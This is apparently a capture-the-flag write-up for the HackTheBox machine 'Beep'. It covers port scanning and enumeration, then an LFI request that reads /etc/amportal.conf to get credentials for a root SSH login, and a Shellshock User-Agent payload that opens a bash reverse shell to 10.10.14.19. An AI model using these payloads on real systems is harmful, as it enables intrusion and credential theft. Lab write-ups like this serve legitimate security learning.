Beep Writeup

Without Metasploit

Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn)

nmap -Pn 10.10.10.7

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,25,80,110,111,143,443,993,995,3306,4445,10000

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,25,80,110,111,143,443,993,995,3306,4445,10000 -oN nmap 10.10.10.7

Just to make sure we are getting all the ports, lets run a nmap scan that covers all ports

nmap -sC -sV -p- -oN nmap_AllPorts 10.10.10.7

Ports

  • Port 22: OpenSSH 4.3 (protocol 2.0)

  • Port 25: Smtp (Postfix smtpd)

  • Port 80: http (Apache httpd 2.2.3)

  • Port 110: pop3 (Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4)

  • Port 111: rpcbind

  • Port 143: imap (Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4)

  • Port 443: ssl / https

  • Port 878: status

  • Port 993: ssl / imap (Cyrus imapd)

  • Port 995: pop3 (Cyrus pop3d)

  • Port 3306: MySQL

  • Port 4190: Sieve (Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap))

  • Port 4445: Upnotifyp

  • Port 4559: hylafax (HylaFAX 4.3.10)

  • Port 5038: asterisk (Asterisk Call Manager 1.1)

  • Port 10000: http Miniserv 1.570 (Webmin httpd)

Notes

  • Port 22 is running a OpenSSH service that is old and exploitable.

  • Ports 25, 110, 143 and 995 are running mail servers.

  • Port 111 is running Rpcbind which is a service used to map other RPC services such as nfs, Mountd, etc.

  • Ports 80, 443 and 10000 are running Web Servers

  • Port 3306 is running a MySQL database

  • Port 4445 is running Upnotifyp which is an online TCP UDP port finder

  • Port 4559 is running HylaFAX 4.3.10. HylaFAX is running an open source fax server which allows sharing of fax equipment among computers.

  • Port 5038 is running Asterisk Call Manager 1.1.

Enumeration

Port 443

Lets visit the application

Its running a software called Elastix, a unified communications server software that brings together IP PBX, email and other functionalities. We do not get any other information so lets run gobuster to find hidden directories. And we have to skip SSL certification with the flag (-k) as its running on https.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.7 -k

Looking through directory , we find the version of FreePBX which is 2.8.1.4 but nothing on Elastix, so lets try searching for exploits on searchsploit

searchsploit elastix

We found few exploits, Cross-site scripting vulnerabilities won't work here as it is a client-side attack and needs user interaction for it to work. We can use exploits such as LFI and Remote Code Execution.

Port 10000

Lets visit the application

It looks like a login page, and also it gives us what it is running on which is "Webmin", lets go to searchsploit and find vulnerabilities on this.

searchsploit webmin

There are so many exploits, looking at all of them , we see something in common which is CGI, something that we exploited in the Shocker box on HackTheBox. And the exploit that we used is called Shellshock, so lets try using that exploit.

Exploitation

Port 443

We are going to exploit the LFI vulnerability to get root privileges on this system. So lets copy the exploit to our directory.

searchsploit -m php/webapps/37637.pl

Reading through the exploit, we can see that we are going to exploit the LFI vulnerability which is in the current_language parameter.

So lets try using this exploit

https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

And we get a lot of information, lets try looking at the source code. Looking at it we find something interesting.

Lets try to ssh into the machine using these credentials.

ssh admin@10.10.10.7

I got this error, which is something that I did see before, and I think that it is something that is not related to false information so I went to google and searched up this error and found an article telling us how to solve this issue. After using it I tried logging in but it said it was the wrong password, so I tried a different username (root) and it worked.

Port 10000

Lets use the Shellshock vulnerability, first we have to capture the request to the web application using Burp Suite and change the User Agent field to the following:

() { :;}; bash -i >& /dev/tcp/10.10.14.19/1234 0>&1

And this will give us a reverse shell, so lets start a listener

nc -lvnp 1234

And now lets run the exploit on Burp Suite, if you want the steps, go to my Shocker writeup, I did not use Burp there but you will be guided till this step and then you can change the User-Agent parameter and send the request.

After clicking send, you should a reverse shell.

Last updated